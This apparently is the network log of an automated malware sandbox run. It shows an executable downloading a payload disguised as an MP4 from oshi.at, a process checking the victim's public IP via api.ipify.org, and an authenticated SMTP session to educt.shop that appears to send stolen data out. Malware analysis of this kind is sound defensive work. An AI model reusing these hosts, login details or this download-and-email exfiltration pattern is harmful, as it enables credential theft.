                                                                                                          Dec 3, 2024 15:20:45.536752939 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.538651943 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.538731098 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.540249109 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.540316105 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.541498899 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.541563034 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.543687105 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.543756008 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.545291901 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.545361042 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.546483040 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.546547890 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.548712969 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.548777103 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.728643894 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.728816032 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.730616093 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.730700970 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.731880903 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.731956959 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.733886003 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.733975887 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.735780954 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.735857964 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.737165928 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.737241030 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.739212036 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.739288092 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.741039991 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.741112947 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.928981066 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.929059029 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.929078102 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.929164886 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.956526041 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.956665039 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.958578110 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.958668947 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.960453033 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.960529089 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.961709976 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.961790085 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.964328051 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.964401007 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.966268063 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.966335058 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.967197895 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.967293024 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.968404055 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.968457937 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.116326094 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.116457939 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.117539883 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.117614985 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.119597912 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.119687080 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.120726109 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.120848894 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.122562885 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:49.966423988 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:49.996599913 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:49.996695995 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:49.998491049 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:49.998572111 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:49.999651909 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:49.999711990 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.001151085 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.001224041 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.001317978 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.044734001 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.202047110 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.202143908 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.202904940 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.202974081 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.403703928 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.403841019 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.454212904 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.454310894 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.455908060 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.456002951 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.457477093 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.457545042 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.458481073 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.458544970 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.459759951 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.459825039 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.703150988 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.703229904 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.704312086 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.704384089 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.706079960 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.706160069 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.707869053 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.707947969 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.904417038 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.904531956 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:50.976769924 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:50.977205038 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:51.201406002 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:51.201513052 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:51.401554108 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:51.401643038 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:51.401653051 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:51.401694059 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:51.430022001 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:51.430155039 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:51.431597948 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:51.431663036 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:51.432595968 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:51.432653904 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:51.672343016 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:51.672509909 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:51.673979998 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:51.674073935 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:51.676168919 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:51.676239967 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:51.676255941 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:51.676321983 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:51.884905100 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:51.885008097 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:51.886107922 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:51.886183977 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:51.887929916 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:51.887995005 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:51.889938116 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:51.889986992 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:52.122322083 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:52.122601032 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:52.123987913 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:52.124073982 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:52.129246950 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:52.129340887 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:52.129662991 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:52.129714966 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:52.138689995 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:52.138775110 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:52.139923096 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:52.139992952 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:52.141257048 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:52.141324043 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:52.141331911 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:52.141345978 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:52.141381979 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:52.174248934 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:21:04.026712894 CET49751443192.168.2.6104.26.13.205
                                                                                                          Dec 3, 2024 15:21:04.026747942 CET44349751104.26.13.205192.168.2.6
                                                                                                          Dec 3, 2024 15:21:04.026806116 CET49751443192.168.2.6104.26.13.205
                                                                                                          Dec 3, 2024 15:21:04.030384064 CET49751443192.168.2.6104.26.13.205
                                                                                                          Dec 3, 2024 15:21:04.030392885 CET44349751104.26.13.205192.168.2.6
                                                                                                          Dec 3, 2024 15:21:05.297956944 CET44349751104.26.13.205192.168.2.6
                                                                                                          Dec 3, 2024 15:21:05.298064947 CET49751443192.168.2.6104.26.13.205
                                                                                                          Dec 3, 2024 15:21:05.316947937 CET49751443192.168.2.6104.26.13.205
                                                                                                          Dec 3, 2024 15:21:05.316971064 CET44349751104.26.13.205192.168.2.6
                                                                                                          Dec 3, 2024 15:21:05.317337990 CET44349751104.26.13.205192.168.2.6
                                                                                                          Dec 3, 2024 15:21:05.372948885 CET49751443192.168.2.6104.26.13.205
                                                                                                          Dec 3, 2024 15:21:05.610876083 CET49751443192.168.2.6104.26.13.205
                                                                                                          Dec 3, 2024 15:21:05.651331902 CET44349751104.26.13.205192.168.2.6
                                                                                                          Dec 3, 2024 15:21:05.950475931 CET44349751104.26.13.205192.168.2.6
                                                                                                          Dec 3, 2024 15:21:05.950541019 CET44349751104.26.13.205192.168.2.6
                                                                                                          Dec 3, 2024 15:21:05.950644970 CET49751443192.168.2.6104.26.13.205
                                                                                                          Dec 3, 2024 15:21:05.953598022 CET49751443192.168.2.6104.26.13.205
                                                                                                          Dec 3, 2024 15:21:07.196882010 CET49759587192.168.2.6162.254.34.31
                                                                                                          Dec 3, 2024 15:21:07.316926956 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:07.317034006 CET49759587192.168.2.6162.254.34.31
                                                                                                          Dec 3, 2024 15:21:08.510656118 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:08.510930061 CET49759587192.168.2.6162.254.34.31
                                                                                                          Dec 3, 2024 15:21:08.631738901 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:08.895291090 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:08.903079987 CET49759587192.168.2.6162.254.34.31
                                                                                                          Dec 3, 2024 15:21:09.102163076 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:09.289201021 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:09.306279898 CET49759587192.168.2.6162.254.34.31
                                                                                                          Dec 3, 2024 15:21:09.429744959 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:09.691726923 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:09.692024946 CET49759587192.168.2.6162.254.34.31
                                                                                                          Dec 3, 2024 15:21:09.812058926 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:10.075598955 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:10.076457977 CET49759587192.168.2.6162.254.34.31
                                                                                                          Dec 3, 2024 15:21:10.196846008 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:10.530888081 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:10.531013966 CET49759587192.168.2.6162.254.34.31
                                                                                                          Dec 3, 2024 15:21:10.651705027 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:10.911946058 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:10.960017920 CET49759587192.168.2.6162.254.34.31
                                                                                                          Dec 3, 2024 15:21:10.960066080 CET49759587192.168.2.6162.254.34.31
                                                                                                          Dec 3, 2024 15:21:10.960094929 CET49759587192.168.2.6162.254.34.31
                                                                                                          Dec 3, 2024 15:21:10.960105896 CET49759587192.168.2.6162.254.34.31
                                                                                                          Dec 3, 2024 15:21:11.080091953 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:11.080116034 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:11.080127001 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:11.080300093 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:11.459167004 CET58749759162.254.34.31192.168.2.6
                                                                                                          Dec 3, 2024 15:21:11.513525009 CET49759587192.168.2.6162.254.34.31
                                                                                                          Dec 3, 2024 15:21:15.040682077 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:21:15.040718079 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:21:15.040797949 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:21:15.047121048 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:21:15.047137022 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:21:16.867909908 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:21:16.867988110 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:21:16.870599031 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:21:16.870608091 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:21:16.870846033 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:21:16.919780970 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:21:16.925765991 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:21:16.971323967 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:12.775299072 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:12.775345087 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:12.775475025 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:12.775494099 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:12.775535107 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:12.775857925 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:12.775909901 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:12.791866064 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:12.792026043 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:12.799987078 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:12.841814041 CET49779443192.168.2.65.253.86.15
                                                                                                          Dec 3, 2024 15:22:22.971051931 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:22.971069098 CET443497795.253.86.15192.168.2.6
                                                                                                          Dec 3, 2024 15:22:22.971158981 CET49779443192.168.2.65.253.86.15
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 3, 2024 15:20:41.056732893 CET | 50217 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 3, 2024 15:20:41.195964098 CET | 53 | 50217 | 1.1.1.1 | 192.168.2.6 |
| Dec 3, 2024 15:21:03.882945061 CET | 65379 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 3, 2024 15:21:04.020481110 CET | 53 | 65379 | 1.1.1.1 | 192.168.2.6 |
| Dec 3, 2024 15:21:14.893758059 CET | 59074 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 3, 2024 15:21:15.034282923 CET | 53 | 59074 | 1.1.1.1 | 192.168.2.6 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 3, 2024 15:20:41.056732893 CET | 192.168.2.6 | 1.1.1.1 | 0xa654 | Standard query (0) | oshi.at | A (IP address) | IN (0x0001) | false |
| Dec 3, 2024 15:21:03.882945061 CET | 192.168.2.6 | 1.1.1.1 | 0xee86 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false |
| Dec 3, 2024 15:21:14.893758059 CET | 192.168.2.6 | 1.1.1.1 | 0xb2b0 | Standard query (0) | oshi.at | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 3, 2024 15:20:37.666531086 CET | 1.1.1.1 | 192.168.2.6 | 0x50a0 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
| Dec 3, 2024 15:20:37.666531086 CET | 1.1.1.1 | 192.168.2.6 | 0x50a0 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
| Dec 3, 2024 15:20:41.195964098 CET | 1.1.1.1 | 192.168.2.6 | 0xa654 | No error (0) | oshi.at | | 194.15.112.248 | A (IP address) | IN (0x0001) | false |
| Dec 3, 2024 15:20:41.195964098 CET | 1.1.1.1 | 192.168.2.6 | 0xa654 | No error (0) | oshi.at | | 5.253.86.15 | A (IP address) | IN (0x0001) | false |
| Dec 3, 2024 15:21:04.020481110 CET | 1.1.1.1 | 192.168.2.6 | 0xee86 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false |
| Dec 3, 2024 15:21:04.020481110 CET | 1.1.1.1 | 192.168.2.6 | 0xee86 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false |
| Dec 3, 2024 15:21:04.020481110 CET | 1.1.1.1 | 192.168.2.6 | 0xee86 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false |
| Dec 3, 2024 15:21:15.034282923 CET | 1.1.1.1 | 192.168.2.6 | 0xb2b0 | No error (0) | oshi.at | | 5.253.86.15 | A (IP address) | IN (0x0001) | false |
| Dec 3, 2024 15:21:15.034282923 CET | 1.1.1.1 | 192.168.2.6 | 0xb2b0 | No error (0) | oshi.at | | 194.15.112.248 | A (IP address) | IN (0x0001) | false |

• oshi.at
• api.ipify.org
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.6 | 49715 | 194.15.112.248 | 443 | 1012 | C:\Users\user\Desktop\Ref#60031796.exe |

Timestamp: 2024-12-03 14:20:43 UTC | Bytes transferred: 61 | Direction: OUT | Data:
GET /Dwhm HTTP/1.1
Host: oshi.at
Connection: Keep-Alive

Timestamp: 2024-12-03 14:20:44 UTC | Bytes transferred: 301 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 Dec 2024 14:20:44 GMT
Content-Type: video/mp4
Content-Length: 998920
Connection: close
Last-Modified: Tue, 03 Dec 2024 08:55:08 GMT
Accept-Ranges: bytes
ETag: "8cf4633de198b56dd7b824d1999ae5f2"
Content-Disposition: attachment; filename=ytCL.mp4


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.6 | 49751 | 104.26.13.205 | 443 | 5716 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |

Timestamp: 2024-12-03 14:21:05 UTC | Bytes transferred: 155 | Direction: OUT | Data:
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive

Timestamp: 2024-12-03 14:21:05 UTC | Bytes transferred: 424 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 14:21:05 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 8ec4337f0a3b726e-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=2006&min_rtt=1996&rtt_var=756&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1462925&cwnd=221&unsent_bytes=0&cid=dfa25d0697bc99d7&ts=663&x=0"

Timestamp: 2024-12-03 14:21:05 UTC | Bytes transferred: 12 | Direction: IN | Data:
Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
Data Ascii: 8.46.123.228


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                          2 | 192.168.2.6 | 49779 | 5.253.86.15 | 443 | 5504 | C:\Users\user\AppData\Roaming\vdvfyt.exe
                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                          2024-12-03 14:21:16 UTC | 61 | OUT | GET /Dwhm HTTP/1.1
                                                                                                          Host: oshi.at
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-03 14:22:12 UTC | 301 | IN | HTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 03 Dec 2024 14:22:12 GMT
                                                                                                          Content-Type: video/mp4
                                                                                                          Content-Length: 998920
                                                                                                          Connection: close
                                                                                                          Accept-Ranges: bytes
                                                                                                          Last-Modified: Tue, 03 Dec 2024 08:55:08 GMT
                                                                                                          ETag: "8cf4633de198b56dd7b824d1999ae5f2"
                                                                                                          Content-Disposition: attachment; filename=ytCL.mp4


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                          3 | 192.168.2.6 | 49973 | 5.253.86.15 | 443 | 5504 | C:\Users\user\AppData\Roaming\vdvfyt.exe
                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                          2024-12-03 14:22:43 UTC | 37 | OUT | GET /Dwhm HTTP/1.1
                                                                                                          Host: oshi.at


                                                                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                                                                          Dec 3, 2024 15:21:08.510656118 CET | 587 | 49759 | 162.254.34.31 | 192.168.2.6 | 220 server1.educt.shop ESMTP Postfix
                                                                                                          Dec 3, 2024 15:21:08.510930061 CET | 49759 | 587 | 192.168.2.6 | 162.254.34.31 | EHLO 445817
                                                                                                          Dec 3, 2024 15:21:08.895291090 CET | 587 | 49759 | 162.254.34.31 | 192.168.2.6 | 250-server1.educt.shop
                                                                                                          250-PIPELINING
                                                                                                          250-SIZE 204800000
                                                                                                          250-ETRN
                                                                                                          250-STARTTLS
                                                                                                          250-AUTH PLAIN LOGIN
                                                                                                          250-AUTH=PLAIN LOGIN
                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                          250-8BITMIME
                                                                                                          250-DSN
                                                                                                          250 CHUNKING
                                                                                                          Dec 3, 2024 15:21:08.903079987 CET | 49759 | 587 | 192.168.2.6 | 162.254.34.31 | AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                                                                          Dec 3, 2024 15:21:09.289201021 CET | 587 | 49759 | 162.254.34.31 | 192.168.2.6 | 334 UGFzc3dvcmQ6
                                                                                                          Dec 3, 2024 15:21:09.691726923 CET | 587 | 49759 | 162.254.34.31 | 192.168.2.6 | 235 2.7.0 Authentication successful
                                                                                                          Dec 3, 2024 15:21:09.692024946 CET | 49759 | 587 | 192.168.2.6 | 162.254.34.31 | MAIL FROM:<sendxambro@educt.shop>
                                                                                                          Dec 3, 2024 15:21:10.075598955 CET | 587 | 49759 | 162.254.34.31 | 192.168.2.6 | 250 2.1.0 Ok
                                                                                                          Dec 3, 2024 15:21:10.076457977 CET | 49759 | 587 | 192.168.2.6 | 162.254.34.31 | RCPT TO:<ambro@educt.shop>
                                                                                                          Dec 3, 2024 15:21:10.530888081 CET | 587 | 49759 | 162.254.34.31 | 192.168.2.6 | 250 2.1.5 Ok
                                                                                                          Dec 3, 2024 15:21:10.531013966 CET | 49759 | 587 | 192.168.2.6 | 162.254.34.31 | DATA
                                                                                                          Dec 3, 2024 15:21:10.911946058 CET | 587 | 49759 | 162.254.34.31 | 192.168.2.6 | 354 End data with <CR><LF>.<CR><LF>
